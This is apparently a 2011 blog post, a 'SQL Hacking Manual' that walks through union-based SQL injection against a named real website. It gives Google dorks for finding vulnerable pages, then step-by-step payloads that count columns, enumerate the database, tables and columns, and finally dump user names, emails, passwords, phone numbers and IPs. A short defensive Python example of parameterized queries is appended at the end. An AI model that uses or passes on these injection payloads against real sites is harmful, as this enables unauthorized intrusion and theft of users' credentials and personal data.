Sunday, 17 July 2011

SQL Hacking Manual

(: Let's Start :)

1. Find VULNERABLE WEBSITE

-USE GOOGLE DORK TO FIND VULNERABLE SITES:

You can use these codes:

"inurl:index.php?catid="

"inurl:news.php?catid="

"inurl:index.php?id="

"inurl:news.php?id="

"inurl:".php?catid=" site:xxx"

2. You got the website, it's SQL vulnerable and we will start:

(I will use my vulnerable website)

Quote:http://wantadsonline.com/index.php?cat=3

Code:

Page is loaded, now just add " ' " and press Enter

http://wantadsonline.com/index.php?cat=3' -ERROR

Ok, now just add "order by 10" to the address

it will look like this "http://wantadsonline.com/index.php?cat=3 order by 10--"

Oops, we got this: [Error: Unknown column '10' in 'order clause']

now just put "order by 4--"

it will look like this one "http://wantadsonline.com/index.php?cat=3 order by 4--"

and we got -[Error: Unknown column '4' in 'order clause']

Now reduce the number by one, it will be 3

so put "order by 3--"

Like "http://wantadsonline.com/index.php?cat=3 order by 3--" in my case

AND -[No Error]-

Yeah

-FINDING VULNERABLE COLUMN TO PERFORM ATTACK:

*Now just add "union all select 1,2,3--" like this "http://wantadsonline.com/index.php?cat=3 union all select 1,2,3--"

-COLUMN "1" is vulnerable,

CHECKING DATABASE VERSION:

Now add "union all select @@version,2,3--"

"http://wantadsonline.com/index.php?cat=3 union all select @@version,2,3--"

CHECKING DATABASE NAME:

By adding "union all select database(),2,3--"

http://wantadsonline.com/index.php?cat=3 union all select database(),2,3--

GETTING TABLE NAMES:

you need to add "union all select table_name,2,3 from information_schema.tables--"

http://wantadsonline.com/index.php?cat=3 union all select table_name,2,3 from information_schema.tables--

GETTING COLUMNS NAMES:

"union all select column_name,2,3 from information_schema.columns--"

Like in "Getting table names", just replace schema.tables-- with schema.columns--

http://wantadsonline.com/index.php?cat=3 union all select column_name,2,3 from information_schema.columns--

GETTING COLUMNS NAMES FROM A CERTAIN TABLE:

METHOD 1:

[CONVERTING TABLE NAME TO HEX]

I will help you there,

website that I use for this is

[http://www.string-functions.com/string-hex.aspx]

Now when you finish converting, it will look like

[http://wantadsonline.com/index.php?cat=3 union all select column_name,2,3 from information_schema.columns WHERE table_name=0xhex value--]

AFTER PUTTING HEX VALUE:

"http://wantadsonline.com/index.php?cat=3 union all select column_name,2,3 from information_schema.columns WHERE table_name=0x75736572--"

METHOD 2:

[CONVERTING TABLE NAME TO ASCII]

Ok, I will help here too

website for converting table name to ascii

[http://getyourwebsitehere.com/jswb/text_to_ascii.html]

After convert:

http://wantadsonline.com/index.php?cat=3 union all select column_name,2,3 from information_schema.columns WHERE table_name=char(ASCII VALUE)--

CODE: user

Delete all the ";" , "#" , and "&". So it should look like this.

CODE: 117,115,101,114

AFTER PUTTING ASCII VALUE:

http://wantadsonline.com/index.php?cat=3 union all select column_name,2,3 from information_schema.columns WHERE table_name=char(117,115,101,114)--

Last method- GETTING USER INFO:

There is a function called concat() that allows me to join the columns and display them on the page. I will also be using : (colon) in hex form. Its hex value is 0x3a (that's a zero at the beginning, not the letter o).

http://wantadsonline.com/index.php?cat=3 union all select concat(user_name,0x3a,email,0x3a,passwd,0x3a,tel,0x3a,city,0x3a,ip),2,3 from user--

YOU ARE DONE!!!
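Every request above works because the `cat` value is pasted into the SQL text before the database parses it. The added example below (not from the original post) shows that query-building pattern beside a version that validates `cat` as an integer and binds it as a parameter. It uses Python with an in-memory SQLite database as a stand-in for the site's PHP/MySQL code; the `ads` table, its rows and all function names are assumptions.

```python
import re
import sqlite3

def make_db():
    """Constructed sample data; SQLite stands in for the site's MySQL."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ads (id INTEGER, title TEXT, cat INTEGER);
        INSERT INTO ads VALUES (1, 'Bike for sale', 3), (2, 'Flat to rent', 4);
    """)
    return db

def list_ads_concat(db, cat):
    # Flawed pattern: the request value becomes part of the SQL text,
    # so "3 union all select 1,2,3--" changes the statement itself.
    sql = "SELECT id, title, cat FROM ads WHERE cat = " + cat
    return db.execute(sql).fetchall()

def list_ads_bound(db, cat):
    # Hardened: reject anything that is not a short run of ASCII digits,
    # then pass the value as a bound parameter, never as SQL text.
    if not re.fullmatch(r"[0-9]{1,9}", cat):
        raise ValueError("cat must be a small non-negative integer")
    return db.execute(
        "SELECT id, title, cat FROM ads WHERE cat = ?", (int(cat),)
    ).fetchall()

def handle_request(db, cat):
    """Return (status, rows); database error text is never sent to the client."""
    try:
        return 200, list_ads_bound(db, cat)
    except ValueError:
        return 400, []   # malformed parameter: reject, and log for review
    except sqlite3.Error:
        return 500, []   # details go to the server log only

if __name__ == "__main__":
    db = make_db()
    probe = "3 union all select 1,2,3--"    # string quoted from the post above
    print(list_ads_concat(db, probe))       # extra row (1, 2, 3) appears
    print(handle_request(db, probe))        # (400, [])
    print(handle_request(db, "3"))          # (200, [(1, 'Bike for sale', 3)])
```

Returning a generic status instead of the database message also removes the `Unknown column ... in 'order clause'` feedback that the column-counting step relies on.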
